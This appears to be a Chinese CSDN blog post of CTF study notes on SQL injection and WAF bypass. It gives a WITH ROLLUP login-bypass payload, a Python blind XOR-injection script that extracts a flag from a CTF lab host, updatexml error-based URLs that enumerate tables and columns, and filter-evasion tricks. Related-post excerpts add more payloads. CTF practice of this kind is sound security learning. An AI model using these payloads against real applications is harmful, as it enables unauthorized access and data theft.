sql注入笔记

最新推荐文章于 2024-05-10 20:28:59 发布
最新推荐文章于 2024-05-10 20:28:59 发布
阅读量247 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45951598/article/details/111076750
版权

Waf从入门到Bypass

文章目录

SQL注入文件读取通过from for分页读取

过滤单引号的时候可用。

在这里插入图片描述

rollwith up注入

这个是只过滤密码,不过滤用户输入的情况下。

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

过滤密码而且过滤用户名

在这里插入图片描述

这里介绍两个mysql语句

group by

一、group by(将结果集中的数据行根据选择列的值进行逻辑分组)
不加group by时的输出如下:
在这里插入图片描述

加group by的时候
在这里插入图片描述

with rollup

(group by 后可以跟with rollup,表示在进行分组统计的基础上再次进行汇总统计)
来看实例:
在这里插入图片描述

其中password列为null,count(*)为统计和。
这里我们就可以通过骚姿势绕过了。

limit 1 offset 2 是需要不断测试,猜测出表中一共有几条数据,最后一条 pwd 的值为 null;

其中/**/是为了绕过空格过滤

payload:admin’/**/or/**/1=1/**/group/**/by/**/password/**/with/**/rollup/**/limit/**/1/**/offset/**/1#
因为加入with rollup后 password有一行为NULL,我们只要输入空密码使得(NULL==NULL)即可满足 p a s s w o r d = = password== password==row[‘password’]的限制成功登陆。
登录成功即可显示flag。

异或盲注脚本

这东西和那个堆叠注入一样,就见过一次,从此再也没用过,但这次就用到了。用它可以起到代替or的作用。
0^(ascii(substr((select(flag)from(flag)),1,1))>1)
但还有一些是没有用异或,用的是if,可if有局限性,在id为数字型时,可以直接 select * from users where id=if(1=1,1,0),但如果id单引号字符型或双引号字符型,那就必须在if前加or或and。
在这里插入图片描述

import requests
from lxml import etree



def b():
    flag = ''
    url = 'http://8f33a0b7-0012-40cb-9aa9-2f462bdaad87.node3.buuoj.cn/index.php'

    text1 = 'Hello, glzjin wants a girlfriend.'

    for i in range(1,1290):
        print('*'*50,i,'*'*50)
        stop = 0
        for j in range(32,128):
            stop = j

            data = {"id":"1^(if((ascii(substr((select(flag)from(flag)),%d,1))=%d),0,1))" % (i, j)}
            #data = {"id":"1^(if((ascii(substr((select(flag)from(flag)),%d,1))=%d),0,1))" % (i, j)}
            # 如果第相等返回1,不等返回0
            re = requests.post(url=url,data=data).text.replace('\n','')
            # 返回文本
            html = etree.HTML(re).xpath("//text()")
            # 查找任意节点的文本
            if text1 in html:

                flag += chr(j)
                print("\n\t\t\t\t", flag)
                break

        if stop >= 128 :
            print('*'*50+i+'*'*50)
            print('flag',flag)
            break

if __name__=="__name__":
     b()

异或报错注入

过滤等号和空格

在这里插入图片描述

过滤了空格可以用括号绕过

过滤了等号可以用like绕过

http://b4dd23d6-1c5c-4653-a31d-e5fdc9f24cde.node3.buuoj.cn/check.php?username=admin%27or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where((table_schema)like(database()))
),0x7e),1))%23&password=123

在这里插入图片描述
爆字段

http://b4dd23d6-1c5c-4653-a31d-e5fdc9f24cde.node3.buuoj.cn/check.php?username=admin%27or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where((table_schema)like(database()))
),0x7e),1))%23&password=123

限制长度

left和right进行拼接
在这里插入图片描述
在这里插入图片描述

multi4
关注
-------已搬运------SQL注入的 过滤 思路 payload 万能密码
Zero_Adam的博客
04-28 1942
目录:一、过滤关键词:1. 过滤 `=` 可用 `like`,`regexp`,`in`来代替:2. 过滤`ascii`,不能用bool盲注了。可用`ord`来代替:3. `,`逗被过滤了:1. `substr(***,1,1)` 用这个来代替:`substr(***from({})for(1))`2.`limit 0,1` 用这个来代替:`limit 1 offset {}`二、一些小trick1. 关于bool盲注的正确与否三、一些payload:1. 过滤了 空格,但是可以联合查询的bool注
SQL注入(自学笔记
woqusss的博客
08-10 407
SQL注入当属漏洞之王,具有高危害性,且利用条件低,利用以及绕过检测方式多种多样。这篇笔记主要从SQL注入的危害性,以及SQL注入的条件,注入点的判断以及寻找,注入的方式以及类型,不同业务场景下对应的不同query方式利用,成功注入后应该进行的步骤,在具有root高权限账户时候应该进行的操作下,防御以及后端过滤方式和Waf绕过,一些本人见过的查询语句闭合方式。...
SQL注入文件读取通过from for分页读取
weixin_30719711的博客
07-11 445
http://103.238.227.13:10088/?id=1 在读取文件的时候发现不能够一下子全部读取出来。经过百度学习了一下,看到别人使用from for说实在此前真不知道这操作。 先来看一下from for吧 1 mysql> select database(); 2 +------------+ 3 | database() | 4 +-----...
CTF学习笔记14:iwebsec-SQL注入漏洞-12-等价函数替换过滤绕过
lvx++的博客
01-23 1336
一、该题会替换等 二、用like代替=
sql注入中的替换技巧。
最新发布
qq_64302290的博客
05-10 1447
注释在sql注入中非常重要,因为会使用它来闭合我们注入的sql语句。当以get方式提交时使用的注释符为: #当以post方式提交时使用的注释符为:‘-- ’ (在url中我们需要写为 --+)当注释被过滤后我们可以使用数字型来进行闭合。比如: and '1' ='1 and "1"="1 等操作。
SQL注入详解(下)
weixin_59571952的博客
12-05 1522
五:常见的waf绕过方式以及实战 1:编码 采用url 十六进制等编码方式进行waf绕过 2:大小写绕过 在尝试的时候可以修改语句中字母的大小写,如果WAF使用是区分大小写的黑名单,那么就可以使用大小写进行绕过 3:过滤符绕过 waf中可能会过滤掉一些特殊符 我们可以利用他们过滤的特殊符来进行绕过 比如 select被拦截了 <>被过滤了 那么我们可以把select写成sel<>ect来进行绕过waf 或者使用双写seselectlect 来进行绕过 4:使用.
SQL注入笔记
02-07
SQL注入笔记 对于新手学习SQL注入很有帮助 欢迎大家查看
SQL注入笔记-union联合查询
03-21
SQL注入笔记-union联合查询
[SWPUCTF 2021 新生赛]sql 关于sql的注入替换
qq_62046696的博客
05-16 2429
打开界面,看见参数是wllm,测试一下是否存在sql注入,首先?wllm=1回显正确,wllm=1'错误存在字符型注入,然后输入人?wllm='1 %23报错发现空格被掠过,然后%23是#的编码。 /**/是空格的一个格式,发现一共有三列 然后测试了一下,=果不其然也被略过,like可以顶替等于 构造? url=wllm=-1'union/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/*
实战 WAF-Bypass之SQL注入绕过思路总结
dzqxwzoe的博客
12-01 1199
WAF攻防研究之四个层次Bypass WAF那些可以绕过WAF的各种特性waf从入门到Bypasshttp://github.wh0ale.xyz/2019/12/04/waf从入门到Bypass/干货|各种WAF绕过手法学习利用分块传输绕WAF技术讨论 | 在HTTP协议层面绕过WAF。
我的WafBypass之道(SQL注入篇)
热门推荐
wjy397的专栏
11-21 1万+
https://xianzhi.aliyun.com/forum/mobile/read/349.html 先知技术社区独家发表本文,如需要转载,请先联系先知技术社区授权;未经授权请勿转载。   先知技术社区投稿邮箱:Aliyun_xianzhi@service.alibaba.com; 有高清无码pdf版本在文末。。。 Author:Tr3jer_CongRon
【WAF剖析】——sql注入之奇淫巧技bypass(持续更新中)
Demo不是emo的博客
11-24 7601
记录我自己认为的平时比较好用的bypass技巧,都是经过了实战渗透检测的,目前内容较少,会实时更新,建议收藏
常见绕过方法总结
weixin_66839513的博客
03-26 2233
两个空格代替一个空格,用Tab代替空格,%a0=空格。绕过的替代类型:%20 --代表url编码的空格,在空格过滤时可以代替。%09--用于在输出或显示文本时在该位置产生一个固定的水平间距,类似于tab键。%0a--代表换行符%0b--用于在输出或显示文本时在该位置产生一个固定的垂直间距,类似于tab键。%0c--%0d--回车换行%a0--代表的是非断行空格%00--%00代表的是ASCII码中的空字符/**/可以将空格字符替换成注释/**/,也可以使用内联注释,/!code。
CTF_ctfshow_登录就有flag
weixin_54227009的博客
05-17 2685
打开靶机是一个登录界面,试了一下普通的sql注入,1' or 1=1#,不行 所以这里用'^0# 分可以用于闭合,井可以用于注释,^进行异或运算,等就是判等,这里需要利用sql的一个点“mysql弱类型转换”,空异或0会查到所有非数字开头的记录 ...
用什么方法绕过SQL注入的限制呢
jahn的专栏
10-11 1026
用什么方法绕过SQL注入的限制呢?到网上考察了一下,提到的方法大多都是针对AND与“”和“=”过滤的突破,虽然有点进步的地方,但还是有一些关键字没有绕过,由于我不常入侵网站所以也不敢对上述过滤的效果进行评论,但是可以肯定的是,效果不会很好……经过我的收集,大部分的防注入程序都过滤了以下关键字:and | select | update | chr | delete | %20from
SQL Injection绕过技巧
weixin_34261739的博客
08-15 1180
0x00 sql注入的原因 sql注入的原因,表面上说是因为 拼接字符串,构成sql语句,没有使用 sql语句预编译,绑定变量。 但是更深层次的原因是,将用户输入的字符串,当成了 “sql语句” 来执行。 比如上面的 String sql = "select id,no from user where id=" + id; 我们希望用户输入的 id 的值,仅仅作为一个字符串字面值,传入数据库执行,...
SQL注入过滤的绕过
谢公子的博客
07-26 5778
在实际的项目开发中,程序猿一般都会使用函数过滤一些字符,以达到防止SQL注入。譬如,下面的php代码使用 preg_replace函数过滤了一些字符 preg_replace('A' , 'B' , C):执行一个正则表达式的搜索和替换,这个的意思是搜索C中符合A的部分,然后用B来代替。 有关这个函数更多的详情:preg_replace函数详解 过滤了字符我们就注入不了了吗?no ,...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值